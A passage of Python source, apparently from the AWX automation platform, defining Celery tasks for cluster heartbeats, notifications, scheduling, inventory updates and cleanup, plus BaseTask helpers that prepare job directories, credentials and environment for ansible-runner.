        for dependent_key in settings_registry.get_dependent_settings(key):
            setting_keys.append(dependent_key)
    cache_keys = set(setting_keys)
    logger.debug('cache delete_many(%r)', cache_keys)
    cache.delete_many(cache_keys)
    if any(key.startswith('LOG_AGGREGATOR') for key in setting_keys):
        reconfigure_rsyslog()
@task(queue='tower_broadcast_all')
def delete_project_files(project_path):
    """Remove a project checkout and its companion lock file on this node."""
    # TODO: possibly implement some retry logic
    lockfile = project_path + '.lock'
    if os.path.exists(project_path):
        try:
            shutil.rmtree(project_path)
            logger.debug('Success removing project files {}'.format(project_path))
        except Exception:
            logger.exception('Could not remove project directory {}'.format(project_path))
    if os.path.exists(lockfile):
        try:
            os.remove(lockfile)
            logger.debug('Success removing {}'.format(lockfile))
        except Exception:
            logger.exception('Could not remove lock file {}'.format(lockfile))
@task(queue='tower_broadcast_all')
def profile_sql(threshold=1, minutes=1):
    """Toggle slow-SQL profiling cluster-wide via a shared cache flag.

    A positive threshold enables profiling for `minutes`; zero or negative
    disables it.
    """
    enabled = threshold > 0
    if enabled:
        cache.set('awx-profile-sql-threshold', threshold, timeout=minutes * 60)
        logger.error('SQL QUERIES >={}s ENABLED FOR {} MINUTE(S)'.format(threshold, minutes))
    else:
        cache.delete('awx-profile-sql-threshold')
        logger.error('SQL PROFILING DISABLED')
@task(queue=get_local_queuename)
def send_notifications(notification_list, job_id=None):
    """Deliver a batch of Notification records.

    When job_id is given, the notifications are linked to that UnifiedJob
    before sending. Each notification's status/error is persisted whether or
    not delivery succeeded.
    """
    if not isinstance(notification_list, list):
        raise TypeError("notification_list should be of type list")
    if job_id is not None:
        job_actual = UnifiedJob.objects.get(id=job_id)

    notifications = Notification.objects.filter(id__in=notification_list)
    if job_id is not None:
        # Associate before sending so the relation exists even if send fails.
        job_actual.notifications.add(*notifications)

    for notification in notifications:
        update_fields = ['status', 'notifications_sent']
        try:
            sent = notification.notification_template.send(notification.subject, notification.body)
            notification.status = "successful"
            notification.notifications_sent = sent
            if job_id is not None:
                job_actual.log_lifecycle("notifications_sent")
        except Exception as e:
            logger.exception("Send Notification Failed {}".format(e))
            notification.status = "failed"
            notification.error = smart_str(e)
            update_fields.append('error')
        finally:
            # Persist the outcome regardless of whether send() raised.
            try:
                notification.save(update_fields=update_fields)
            except Exception:
                logger.exception('Error saving notification {} result.'.format(notification.id))
@task(queue=get_local_queuename)
def gather_analytics():
    """Run the analytics gatherer when the configured interval has elapsed."""
    from awx.conf.models import Setting
    from rest_framework.fields import DateTimeField

    gather_time = now()
    last_gather = Setting.objects.filter(key='AUTOMATION_ANALYTICS_LAST_GATHER').first()
    if last_gather and last_gather.value:
        last_time = DateTimeField().to_internal_value(last_gather.value)
    else:
        last_time = None

    interval_elapsed = last_time is None or (gather_time - last_time).total_seconds() > settings.AUTOMATION_ANALYTICS_GATHER_INTERVAL
    if interval_elapsed:
        analytics.gather()
@task(queue=get_local_queuename)
def purge_old_stdout_files():
    """Delete files in JOBOUTPUT_ROOT older than LOCAL_STDOUT_EXPIRE_TIME seconds."""
    nowtime = time.time()
    cutoff = nowtime - settings.LOCAL_STDOUT_EXPIRE_TIME
    for f in os.listdir(settings.JOBOUTPUT_ROOT):
        # Join the path once instead of three times per entry.
        full_path = os.path.join(settings.JOBOUTPUT_ROOT, f)
        if os.path.getctime(full_path) < cutoff:
            os.unlink(full_path)
            logger.debug("Removing {}".format(full_path))
@task(queue=get_local_queuename)
def cleanup_execution_environment_images():
    """Remove dangling podman images on non-k8s nodes."""
    if settings.IS_K8S:
        return
    list_cmd = 'podman images --filter="dangling=true" --format json'.split(" ")
    listing = subprocess.run(list_cmd, capture_output=True)
    if listing.returncode != 0:
        logger.debug("Cleanup execution environment images: could not get list of images")
        return
    if not listing.stdout:
        return
    for entry in json.loads(listing.stdout):
        image_name = entry["Id"]
        logger.debug(f"Cleanup execution environment images: deleting {image_name}")
        removal = subprocess.run(['podman', 'rmi', image_name, '-f'], stdout=subprocess.DEVNULL)
        if removal.returncode != 0:
            logger.debug(f"Failed to delete image {image_name}")
@task(queue=get_local_queuename)
def cluster_node_heartbeat():
    """Periodic liveness task for this cluster node.

    Refreshes this instance's capacity, detects lost peers (reaping their
    jobs and zeroing or deprovisioning them), and shuts down local services
    if any peer reports a newer application version.
    """
    logger.debug("Cluster node heartbeat task.")
    nowtime = now()
    instance_list = list(Instance.objects.all())
    this_inst = None
    lost_instances = []

    # Ensure this node is registered before inspecting the cluster.
    (changed, instance) = Instance.objects.get_or_register()
    if changed:
        logger.info("Registered tower node '{}'".format(instance.hostname))

    # Partition peers into "us", "lost", and "healthy others" (left in list).
    for inst in list(instance_list):
        if inst.hostname == settings.CLUSTER_HOST_ID:
            this_inst = inst
            instance_list.remove(inst)
        elif inst.is_lost(ref_time=nowtime):
            lost_instances.append(inst)
            instance_list.remove(inst)
    if this_inst:
        # If we ourselves were considered lost, this heartbeat is a rejoin.
        startup_event = this_inst.is_lost(ref_time=nowtime)
        this_inst.refresh_capacity()
        if startup_event:
            logger.warning('Rejoining the cluster as instance {}.'.format(this_inst.hostname))
            return
    else:
        raise RuntimeError("Cluster Host Not Found: {}".format(settings.CLUSTER_HOST_ID))
    # IFF any node has a greater version than we do, then we'll shutdown services
    for other_inst in instance_list:
        if other_inst.version == "":
            continue
        if Version(other_inst.version.split('-', 1)[0]) > Version(awx_application_version.split('-', 1)[0]) and not settings.DEBUG:
            logger.error(
                "Host {} reports version {}, but this node {} is at {}, shutting down".format(
                    other_inst.hostname, other_inst.version, this_inst.hostname, this_inst.version
                )
            )
            # Shutdown signal will set the capacity to zero to ensure no Jobs get added to this instance.
            # The heartbeat task will reset the capacity to the system capacity after upgrade.
            stop_local_services(communicate=False)
            raise RuntimeError("Shutting down.")

    for other_inst in lost_instances:
        try:
            # Mark jobs the lost node was running as failed/reaped.
            reaper.reap(other_inst)
        except Exception:
            logger.exception('failed to reap jobs for {}'.format(other_inst.hostname))
        try:
            # Capacity could already be 0 because:
            # * It's a new node and it never had a heartbeat
            # * It was set to 0 by another tower node running this method
            # * It was set to 0 by this node, but auto deprovisioning is off
            #
            # If auto deprovisining is on, don't bother setting the capacity to 0
            # since we will delete the node anyway.
            if other_inst.capacity != 0 and not settings.AWX_AUTO_DEPROVISION_INSTANCES:
                other_inst.capacity = 0
                other_inst.save(update_fields=['capacity'])
                logger.error("Host {} last checked in at {}, marked as lost.".format(other_inst.hostname, other_inst.modified))
            elif settings.AWX_AUTO_DEPROVISION_INSTANCES:
                deprovision_hostname = other_inst.hostname
                other_inst.delete()
                logger.info("Host {} Automatically Deprovisioned.".format(deprovision_hostname))
        except DatabaseError as e:
            if 'did not affect any rows' in str(e):
                # A peer node raced us and already marked this instance lost.
                logger.debug('Another instance has marked {} as lost'.format(other_inst.hostname))
            else:
                logger.exception('Error marking {} as lost'.format(other_inst.hostname))
@task(queue=get_local_queuename)
def awx_k8s_reaper():
    """Delete kubernetes pods left behind by jobs that are no longer active."""
    if not settings.RECEPTOR_RELEASE_WORK:
        return

    from awx.main.scheduler.kubernetes import PodManager  # prevent circular import

    container_groups = InstanceGroup.objects.filter(is_container_group=True).iterator()
    for group in container_groups:
        logger.debug("Checking for orphaned k8s pods for {}.".format(group))
        pods = PodManager.list_active_jobs(group)
        inactive_jobs = UnifiedJob.objects.filter(pk__in=pods.keys()).exclude(status__in=ACTIVE_STATES)
        for job in inactive_jobs:
            logger.debug('{} is no longer active, reaping orphaned k8s pod'.format(job.log_format))
            try:
                pm = PodManager(job)
                pm.kube_api.delete_namespaced_pod(name=pods[job.id], namespace=pm.namespace, _request_timeout=settings.AWX_CONTAINER_GROUP_K8S_API_TIMEOUT)
            except Exception:
                logger.exception("Failed to delete orphaned pod {} from {}".format(job.log_format, group))
@task(queue=get_local_queuename)
def awx_periodic_scheduler():
    """Launch jobs for schedules that became due since the last scheduler run.

    Guarded by an advisory lock so only one node runs it at a time.
    """
    with advisory_lock('awx_periodic_scheduler_lock', wait=False) as acquired:
        if acquired is False:
            logger.debug("Not running periodic scheduler, another task holds lock")
            return
        logger.debug("Starting periodic scheduler")

        run_now = now()
        state = TowerScheduleState.get_solo()
        last_run = state.schedule_last_run
        logger.debug("Last scheduler run was: %s", last_run)
        # Claim this window immediately so a crash doesn't replay it.
        state.schedule_last_run = run_now
        state.save()

        # Schedules stale before the window: refresh computed fields
        # (e.g. next_run) without launching anything.
        old_schedules = Schedule.objects.enabled().before(last_run)
        for schedule in old_schedules:
            schedule.update_computed_fields()
        schedules = Schedule.objects.enabled().between(last_run, run_now)

        invalid_license = False
        try:
            access_registry[Job](None).check_license(quiet=True)
        except PermissionDenied as e:
            invalid_license = e

        for schedule in schedules:
            template = schedule.unified_job_template
            schedule.update_computed_fields()  # To update next_run timestamp.
            if template.cache_timeout_blocked:
                logger.warn("Cache timeout is in the future, bypassing schedule for template %s" % str(template.id))
                continue
            try:
                job_kwargs = schedule.get_job_kwargs()
                new_unified_job = schedule.unified_job_template.create_unified_job(**job_kwargs)
                logger.debug('Spawned {} from schedule {}-{}.'.format(new_unified_job.log_format, schedule.name, schedule.pk))

                if invalid_license:
                    # Spawn the job but fail it right away so the license
                    # problem is visible on the job record.
                    new_unified_job.status = 'failed'
                    new_unified_job.job_explanation = str(invalid_license)
                    new_unified_job.save(update_fields=['status', 'job_explanation'])
                    new_unified_job.websocket_emit_status("failed")
                    raise invalid_license
                can_start = new_unified_job.signal_start()
            except Exception:
                logger.exception('Error spawning scheduled job.')
                continue
            if not can_start:
                new_unified_job.status = 'failed'
                new_unified_job.job_explanation = gettext_noop(
                    "Scheduled job could not start because it \
was not in the right state or required manual credentials"
                )
                new_unified_job.save(update_fields=['status', 'job_explanation'])
                new_unified_job.websocket_emit_status("failed")
            emit_channel_notification('schedules-changed', dict(id=schedule.id, group_name="schedules"))
        state.save()
@task(queue=get_local_queuename)
def handle_work_success(task_actual):
    """On job success, poke the task manager so dependent work can start."""
    try:
        instance = UnifiedJob.get_instance_by_type(task_actual['type'], task_actual['id'])
    except ObjectDoesNotExist:
        logger.warning('Missing {} `{}` in success callback.'.format(task_actual['type'], task_actual['id']))
        return
    if instance:
        schedule_task_manager()
@task(queue=get_local_queuename)
def handle_work_error(task_id, *args, **kwargs):
    """Propagate a task failure to its dependent subtasks.

    Every subtask other than the failed task itself (and any that are already
    canceled or successful) is marked failed, with a job_explanation that
    records the first job in the chain. The task manager is poked once at the
    end.
    """
    subtasks = kwargs.get('subtasks', None)
    logger.debug('Executing error task id %s, subtasks: %s' % (task_id, str(subtasks)))
    first_instance = None
    first_instance_type = ''
    if subtasks is not None:
        for each_task in subtasks:
            try:
                instance = UnifiedJob.get_instance_by_type(each_task['type'], each_task['id'])
                if not instance:
                    # Unknown task type
                    # logger.warn is a deprecated alias of logger.warning
                    logger.warning("Unknown task type: {}".format(each_task['type']))
                    continue
            except ObjectDoesNotExist:
                logger.warning('Missing {} `{}` in error callback.'.format(each_task['type'], each_task['id']))
                continue

            if first_instance is None:
                first_instance = instance
                first_instance_type = each_task['type']

            if instance.celery_task_id != task_id and not instance.cancel_flag and not instance.status == 'successful':
                instance.status = 'failed'
                instance.failed = True
                if not instance.job_explanation:
                    instance.job_explanation = 'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}' % (
                        first_instance_type,
                        first_instance.name,
                        first_instance.id,
                    )
                instance.save()
                instance.websocket_emit_status("failed")

    # We only send 1 job complete message since all the job completion message
    # handling does is trigger the scheduler. If we extend the functionality of
    # what the job complete message handler does then we may want to send a
    # completion event for each job here.
    if first_instance:
        schedule_task_manager()
@task(queue=get_local_queuename)
def handle_success_and_failure_notifications(job_id):
    """Send success/failure notification templates for a finished job.

    The job's status may still be transitioning when this task fires, so poll
    up to 5 times (1 second apart) for the job to reach a finished state
    before giving up.
    """
    uj = UnifiedJob.objects.get(pk=job_id)
    retries = 0
    while retries < 5:
        if uj.finished:
            uj.send_notification_templates('succeeded' if uj.status == 'successful' else 'failed')
            return
        else:
            # wait a few seconds to avoid a race where the
            # events are persisted _before_ the UJ.status
            # changes from running -> successful
            retries += 1
            time.sleep(1)
            uj = UnifiedJob.objects.get(pk=job_id)

    # logger.warn is a deprecated alias of logger.warning
    logger.warning(f"Failed to even try to send notifications for job '{uj}' due to job not being in finished state.")
@task(queue=get_local_queuename)
def update_inventory_computed_fields(inventory_id):
    """
    Signal handler and wrapper around inventory.update_computed_fields to
    prevent unnecessary recursive calls.
    """
    matching = Inventory.objects.filter(id=inventory_id)
    if not matching.exists():
        logger.error("Update Inventory Computed Fields failed due to missing inventory: " + str(inventory_id))
        return
    inventory = matching[0]
    try:
        inventory.update_computed_fields()
    except DatabaseError as e:
        # A concurrent task already performed the same update; bail quietly.
        if 'did not affect any rows' in str(e):
            logger.debug('Exiting duplicate update_inventory_computed_fields task.')
            return
        raise
def update_smart_memberships_for_inventory(smart_inventory):
    """Reconcile cached SmartInventoryMembership rows with the hosts that
    currently match the smart inventory's filter.

    Returns True when any membership rows changed, False otherwise.
    """
    current = set(SmartInventoryMembership.objects.filter(inventory=smart_inventory).values_list('host_id', flat=True))
    new = set(smart_inventory.hosts.values_list('id', flat=True))
    additions = new - current
    removals = current - new
    if not (additions or removals):
        return False

    with transaction.atomic():
        if removals:
            SmartInventoryMembership.objects.filter(inventory=smart_inventory, host_id__in=removals).delete()
        if additions:
            add_for_inventory = [SmartInventoryMembership(inventory_id=smart_inventory.id, host_id=host_id) for host_id in additions]
            SmartInventoryMembership.objects.bulk_create(add_for_inventory, ignore_conflicts=True)
        logger.debug(
            'Smart host membership cached for {}, {} additions, {} removals, {} total count.'.format(
                smart_inventory.pk, len(additions), len(removals), len(new)
            )
        )
    return True  # changed
@task(queue=get_local_queuename)
def update_host_smart_inventory_memberships():
    """Refresh membership caches for every smart inventory, then recompute
    computed fields only for inventories whose membership actually changed."""
    changed_inventories = set()
    candidates = Inventory.objects.filter(kind='smart', host_filter__isnull=False, pending_deletion=False)
    for smart_inventory in candidates:
        try:
            if update_smart_memberships_for_inventory(smart_inventory):
                changed_inventories.add(smart_inventory)
        except IntegrityError:
            logger.exception('Failed to update smart inventory memberships for {}'.format(smart_inventory.pk))
    # Update computed fields for changed inventories outside atomic action
    for smart_inventory in changed_inventories:
        smart_inventory.update_computed_fields()
@task(queue=get_local_queuename)
def migrate_legacy_event_data(tblname):
    #
    # NOTE: this function is not actually in use anymore,
    # but has been intentionally kept for historical purposes,
    # and to serve as an illustration if we ever need to perform
    # bulk modification/migration of event data in the future.
    #
    # Copies rows in chunks from _old_<tblname> into <tblname>, deleting them
    # from the old table inside the same transaction, then drops the old
    # table once it is empty.
    if 'event' not in tblname:
        return
    with advisory_lock(f'bigint_migration_{tblname}', wait=False) as acquired:
        if acquired is False:
            return
        chunk = settings.JOB_EVENT_MIGRATION_CHUNK_SIZE

        def _remaining():
            # Highest remaining id in the old table, or None once the table
            # no longer exists (ProgrammingError).
            try:
                cursor.execute(f'SELECT MAX(id) FROM _old_{tblname};')
                return cursor.fetchone()[0]
            except ProgrammingError:
                # the table is gone (migration is unnecessary)
                return None

        with connection.cursor() as cursor:
            total_rows = _remaining()
            # Loop exits via the break below once an INSERT copies nothing.
            while total_rows:
                with transaction.atomic():
                    cursor.execute(f'INSERT INTO {tblname} SELECT * FROM _old_{tblname} ORDER BY id DESC LIMIT {chunk} RETURNING id;')
                    last_insert_pk = cursor.fetchone()
                    if last_insert_pk is None:
                        # this means that the SELECT from the old table was
                        # empty, and there was nothing to insert (so we're done)
                        break
                    last_insert_pk = last_insert_pk[0]
                    cursor.execute(f'DELETE FROM _old_{tblname} WHERE id IN (SELECT id FROM _old_{tblname} ORDER BY id DESC LIMIT {chunk});')
                logger.warn(f'migrated int -> bigint rows to {tblname} from _old_{tblname}; # ({last_insert_pk} rows remaining)')
            if _remaining() is None:
                cursor.execute(f'DROP TABLE IF EXISTS _old_{tblname}')
                logger.warn(f'{tblname} primary key migration to bigint has finished')
@task(queue=get_local_queuename)
def delete_inventory(inventory_id, user_id, retries=5):
    """Delete an inventory on behalf of a user, retrying on transient DB errors."""
    # Delete inventory as user
    if user_id is None:
        user = None
    else:
        try:
            user = User.objects.get(id=user_id)
        except Exception:
            # Fall back to an anonymous delete if the user no longer exists.
            user = None
    with ignore_inventory_computed_fields(), ignore_inventory_group_removal(), impersonate(user):
        try:
            i = Inventory.objects.get(id=inventory_id)
            for host in i.hosts.iterator():
                # Detach job events from the hosts before the delete cascade.
                host.job_events_as_primary_host.update(host=None)
            i.delete()
            emit_channel_notification('inventories-status_changed', {'group_name': 'inventories', 'inventory_id': inventory_id, 'status': 'deleted'})
            logger.debug('Deleted inventory {} as user {}.'.format(inventory_id, user_id))
        except Inventory.DoesNotExist:
            logger.exception("Delete Inventory failed due to missing inventory: " + str(inventory_id))
            return
        except DatabaseError:
            # Retry synchronously, up to `retries` more times, 10s apart.
            logger.exception('Database error deleting inventory {}, but will retry.'.format(inventory_id))
            if retries > 0:
                time.sleep(10)
                delete_inventory(inventory_id, user_id, retries=retries - 1)
def with_path_cleanup(f):
    """Decorator for task methods: after the wrapped call returns or raises,
    remove every filesystem path accumulated in self.cleanup_paths, then
    reset the list."""

    def _cleanup(paths):
        # Best-effort removal; an OSError on one path does not stop the rest.
        for path in paths:
            try:
                if os.path.isdir(path):
                    shutil.rmtree(path, ignore_errors=True)
                elif os.path.exists(path):
                    os.remove(path)
            except OSError:
                logger.exception("Failed to remove tmp file: {}".format(path))

    @functools.wraps(f)
    def _wrapped(self, *args, **kwargs):
        try:
            return f(self, *args, **kwargs)
        finally:
            _cleanup(self.cleanup_paths)
            self.cleanup_paths = []

    return _wrapped
class BaseTask(object):
    """Base class for running a unified job via ansible-runner."""

    # Subclasses bind these to the concrete unified-job model and its
    # corresponding event model.
    model = None
    event_model = None
    abstract = True

    def __init__(self):
        # Paths removed by the with_path_cleanup decorator once run() ends.
        self.cleanup_paths = []
        # Set in run() when the job was spawned by a workflow; included in
        # emitted event data.
        self.parent_workflow_job_id = None
        # host name -> host id mapping, built from the inventory script data.
        self.host_map = {}
        self.guid = GuidMiddleware.get_guid()
def update_model(self, pk, _attempt=0, **updates):
    """Reload the model instance from the database and update the
    given fields.

    Retries up to 5 times, 5 seconds apart, on DatabaseError. Returns the
    refreshed instance, or None when every retry failed. When 'status' is
    among the updates, the derived 'failed' field is saved as well.
    """
    try:
        with transaction.atomic():
            # Retrieve the model instance.
            instance = self.model.objects.get(pk=pk)

            # Update the appropriate fields and save the model
            # instance, then return the new instance.
            if updates:
                update_fields = ['modified']
                for field, value in updates.items():
                    setattr(instance, field, value)
                    update_fields.append(field)
                    if field == 'status':
                        update_fields.append('failed')
                instance.save(update_fields=update_fields)
            return instance
    except DatabaseError as e:
        # Log out the error to the debug logger.
        logger.debug('Database error updating %s, retrying in 5 ' 'seconds (retry #%d): %s', self.model._meta.object_name, _attempt + 1, e)

        # Attempt to retry the update, assuming we haven't already
        # tried too many times.
        if _attempt < 5:
            time.sleep(5)
            return self.update_model(pk, _attempt=_attempt + 1, **updates)
        else:
            logger.error('Failed to update %s after %d retries.', self.model._meta.object_name, _attempt)
def get_path_to(self, *args):
    """
    Return absolute path relative to this file.
    """
    here = os.path.dirname(__file__)
    return os.path.abspath(os.path.join(here, *args))
def build_execution_environment_params(self, instance, private_data_dir):
    """Build ansible-runner params for running the job inside a podman
    container. Returns {} on k8s, where the container is managed externally.
    """
    if settings.IS_K8S:
        return {}

    image = instance.execution_environment.image
    params = {
        "container_image": image,
        "process_isolation": True,
        "container_options": ['--user=root'],
    }

    if instance.execution_environment.credential:
        cred = instance.execution_environment.credential
        if cred.has_inputs(field_names=('host', 'username', 'password')):
            # Write a podman auth.json next to the private data dir so the
            # registry pull can authenticate; owner read/write only.
            path = os.path.split(private_data_dir)[0]
            with open(path + '/auth.json', 'w') as authfile:
                os.chmod(authfile.name, stat.S_IRUSR | stat.S_IWUSR)

                host = cred.get_input('host')
                username = cred.get_input('username')
                password = cred.get_input('password')
                token = "{}:{}".format(username, password)
                auth_data = {'auths': {host: {'auth': b64encode(token.encode('UTF-8')).decode('UTF-8')}}}
                authfile.write(json.dumps(auth_data, indent=4))
            params["container_options"].append(f'--authfile={authfile.name}')
        else:
            raise RuntimeError('Please recheck that your host, username, and password fields are all filled.')

    pull = instance.execution_environment.pull
    if pull:
        params['container_options'].append(f'--pull={pull}')

    if settings.AWX_ISOLATION_SHOW_PATHS:
        params['container_volume_mounts'] = []
        for this_path in settings.AWX_ISOLATION_SHOW_PATHS:
            # Using z allows the dir to mounted by multiple containers
            # Uppercase Z restricts access (in weird ways) to 1 container at a time
            params['container_volume_mounts'].append(f'{this_path}:{this_path}:z')
    return params
def build_private_data(self, instance, private_data_dir):
    """
    Return SSH private key data (only if stored in DB as ssh_key_data).
    Return structure is a dict of the form:

        {'credentials': {<Credential>: '<decrypted key text>', ...},
         'certificates': {<Credential>: '<signed certificate text>', ...}}

    This base implementation returns None (no private data); subclasses
    provide the real data consumed by build_private_data_files().
    """
def build_private_data_dir(self, instance):
    """
    Create a temporary directory for job-related files.

    Returns the inner private-data dir; the outer wrapper dir is registered
    for cleanup when AWX_CLEANUP_PATHS is enabled.
    """
    owner_only = stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR
    pdd_wrapper_path = tempfile.mkdtemp(prefix=f'pdd_wrapper_{instance.pk}_', dir=settings.AWX_ISOLATION_BASE_PATH)
    os.chmod(pdd_wrapper_path, owner_only)
    if settings.AWX_CLEANUP_PATHS:
        self.cleanup_paths.append(pdd_wrapper_path)

    path = tempfile.mkdtemp(prefix='awx_%s_' % instance.pk, dir=pdd_wrapper_path)
    os.chmod(path, owner_only)
    # Ansible runner requires that project exists,
    # and we will write files in the other folders without pre-creating the folder
    for subfolder in ('project', 'inventory', 'env'):
        runner_subfolder = os.path.join(path, subfolder)
        if not os.path.exists(runner_subfolder):
            os.mkdir(runner_subfolder)
    return path
def build_private_data_files(self, instance, private_data_dir):
    """
    Creates temporary files containing the private data.
    Returns a dictionary i.e.,

    {
        'credentials': {
            <awx.main.models.Credential>: '/path/to/decrypted/data',
            <awx.main.models.Credential>: '/path/to/decrypted/data',
            ...
        },
        'certificates': {
            <awx.main.models.Credential>: /path/to/signed/ssh/certificate,
            <awx.main.models.Credential>: /path/to/signed/ssh/certificate,
            ...
        }
    }
    """
    private_data = self.build_private_data(instance, private_data_dir)
    private_data_files = {'credentials': {}}
    if private_data is not None:
        for credential, data in private_data.get('credentials', {}).items():
            # OpenSSH formatted keys must have a trailing newline to be
            # accepted by ssh-add.
            if 'OPENSSH PRIVATE KEY' in data and not data.endswith('\n'):
                data += '\n'
            # For credentials used with ssh-add, write to a named pipe which
            # will be read then closed, instead of leaving the SSH key on disk.
            if credential and credential.credential_type.namespace in ('ssh', 'scm'):
                try:
                    os.mkdir(os.path.join(private_data_dir, 'env'))
                except OSError as e:
                    if e.errno != errno.EEXIST:
                        raise
                path = os.path.join(private_data_dir, 'env', 'ssh_key')
                ansible_runner.utils.open_fifo_write(path, data.encode())
                private_data_files['credentials']['ssh'] = path
            # Ansible network modules do not yet support ssh-agent.
            # Instead, ssh private key file is explicitly passed via an
            # env variable.
            else:
                handle, path = tempfile.mkstemp(dir=os.path.join(private_data_dir, 'env'))
                f = os.fdopen(handle, 'w')
                f.write(data)
                f.close()
                os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
                private_data_files['credentials'][credential] = path

        for credential, data in private_data.get('certificates', {}).items():
            artifact_dir = os.path.join(private_data_dir, 'artifacts', str(self.instance.id))
            if not os.path.exists(artifact_dir):
                os.makedirs(artifact_dir, mode=0o700)
            # NOTE(review): filename is fixed, so multiple certificate
            # credentials would overwrite each other — confirm intended.
            path = os.path.join(artifact_dir, 'ssh_key_data-cert.pub')
            with open(path, 'w') as f:
                f.write(data)
                f.close()
            os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
    return private_data_files
def build_passwords(self, instance, runtime_passwords):
    """
    Build a dictionary of passwords for responding to prompts.

    The base mapping answers yes/no confirmation prompts and empty prompts;
    subclasses extend it with real credential passwords.
    """
    passwords = {}
    for answer in ('yes', 'no', ''):
        passwords[answer] = answer
    return passwords
def build_extra_vars_file(self, instance, private_data_dir):
    """
    Build ansible yaml file filled with extra vars to be passed via -e@file.yml

    Base implementation is a no-op; subclasses write the file via
    _write_extra_vars_file as needed.
    """
def _write_extra_vars_file(self, private_data_dir, vars, safe_dict=None):
    """Write `vars` to <private_data_dir>/env/extravars (owner read-only)
    and return the file path.

    Jinja is allowed in the output only when ALLOW_JINJA_IN_EXTRA_VARS is
    'always'; otherwise safe_dump() is used with the given safe_dict.
    """
    # Avoid a shared mutable default argument; None means "no safe vars".
    if safe_dict is None:
        safe_dict = {}
    env_path = os.path.join(private_data_dir, 'env')
    try:
        os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
    except OSError as e:
        if e.errno != errno.EEXIST:
            raise

    path = os.path.join(env_path, 'extravars')
    handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
    f = os.fdopen(handle, 'w')
    if settings.ALLOW_JINJA_IN_EXTRA_VARS == 'always':
        f.write(yaml.safe_dump(vars))
    else:
        f.write(safe_dump(vars, safe_dict))
    f.close()
    os.chmod(path, stat.S_IRUSR)
    return path
def add_awx_venv(self, env):
    """Point `env` at the AWX virtualenv, prepending its bin dir to PATH."""
    env['VIRTUAL_ENV'] = settings.AWX_VENV_PATH
    venv_bin = os.path.join(settings.AWX_VENV_PATH, "bin")
    existing_path = env.get('PATH')
    if existing_path is not None:
        env['PATH'] = venv_bin + ":" + existing_path
    else:
        env['PATH'] = venv_bin
def build_env(self, instance, private_data_dir, private_data_files=None):
    """
    Build environment dictionary for ansible-playbook.
    """
    env = {}
    # Add ANSIBLE_* settings to the subprocess environment.
    for attr in dir(settings):
        if attr == attr.upper() and attr.startswith('ANSIBLE_'):
            env[attr] = str(getattr(settings, attr))

    # Also set environment variables configured in AWX_TASK_ENV setting.
    for key, value in settings.AWX_TASK_ENV.items():
        env[key] = str(value)

    env['AWX_PRIVATE_DATA_DIR'] = private_data_dir

    if self.instance.execution_environment is None:
        raise RuntimeError('The project could not sync because there is no Execution Environment.')

    ee_cred = self.instance.execution_environment.credential
    if ee_cred:
        verify_ssl = ee_cred.get_input('verify_ssl')
        if not verify_ssl:
            # Write a registries.conf marking the registry insecure so the
            # container runtime pulls from it without TLS verification.
            pdd_wrapper_path = os.path.split(private_data_dir)[0]
            registries_conf_path = os.path.join(pdd_wrapper_path, 'registries.conf')
            host = ee_cred.get_input('host')

            with open(registries_conf_path, 'w') as registries_conf:
                os.chmod(registries_conf.name, stat.S_IRUSR | stat.S_IWUSR)

                lines = [
                    '[[registry]]',
                    'location = "{}"'.format(host),
                    'insecure = true',
                ]

                registries_conf.write('\n'.join(lines))

            # Podman >= 3.1.0
            env['CONTAINERS_REGISTRIES_CONF'] = registries_conf_path
            # Podman < 3.1.0
            env['REGISTRIES_CONFIG_PATH'] = registries_conf_path

    return env
def build_inventory(self, instance, private_data_dir):
    """Write the inventory as an executable script at
    <private_data_dir>/inventory/hosts and return its path.

    Also populates self.host_map (host name -> host id) from the script's
    _meta hostvars.
    """
    script_params = dict(hostvars=True, towervars=True)
    if hasattr(instance, 'job_slice_number'):
        script_params['slice_number'] = instance.job_slice_number
        script_params['slice_count'] = instance.job_slice_count
    script_data = instance.inventory.get_script_data(**script_params)
    # maintain a list of host_name --> host_id
    # so we can associate emitted events to Host objects
    self.host_map = {hostname: hv.pop('remote_tower_id', '') for hostname, hv in script_data.get('_meta', {}).get('hostvars', {}).items()}
    json_data = json.dumps(script_data)

    path = os.path.join(private_data_dir, 'inventory')
    fn = os.path.join(path, 'hosts')
    with open(fn, 'w') as f:
        os.chmod(fn, stat.S_IRUSR | stat.S_IXUSR | stat.S_IWUSR)
        # The "script" just prints the pre-rendered JSON when executed.
        f.write('#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\nprint(%r)\n' % json_data)
    return fn
def build_args(self, instance, private_data_dir, passwords):
    """Build the command-line argument list for the run; subclasses must implement."""
    raise NotImplementedError
def write_args_file(self, private_data_dir, args):
    """Persist the command line to <private_data_dir>/env/cmdline
    (owner read-only) and return its path."""
    env_path = os.path.join(private_data_dir, 'env')
    try:
        os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
    except OSError as e:
        if e.errno != errno.EEXIST:
            raise

    path = os.path.join(env_path, 'cmdline')
    handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
    with os.fdopen(handle, 'w') as f:
        f.write(ansible_runner.utils.args2cmdline(*args))
    os.chmod(path, stat.S_IRUSR)
    return path
def build_credentials_list(self, instance):
    # Base implementation uses no credentials; subclasses override.
    return []
def get_instance_timeout(self, instance):
    """Resolve the effective timeout for `instance`.

    A per-instance timeout of 0 falls back to the global setting; a negative
    per-instance timeout disables the timeout entirely (returns 0).
    """
    global_timeout_setting_name = instance._global_timeout_setting()
    if not global_timeout_setting_name:
        return 0
    global_timeout = getattr(settings, global_timeout_setting_name, 0)
    local_timeout = getattr(instance, 'timeout', 0)
    if local_timeout == 0:
        return global_timeout
    if local_timeout < 0:
        return 0
    return local_timeout
def get_password_prompts(self, passwords={}):
    """
    Return a dictionary where keys are strings or regular expressions for
    prompts, and values are password lookup keys (keys that are returned
    from build_passwords).
    """
    # Base tasks answer no prompts; subclasses add entries.
    prompts = OrderedDict()
    return prompts
def create_expect_passwords_data_struct(self, password_prompts, passwords):
    """Map each prompt pattern to its actual password text, defaulting to ''
    when the lookup key is missing or its value is falsy."""
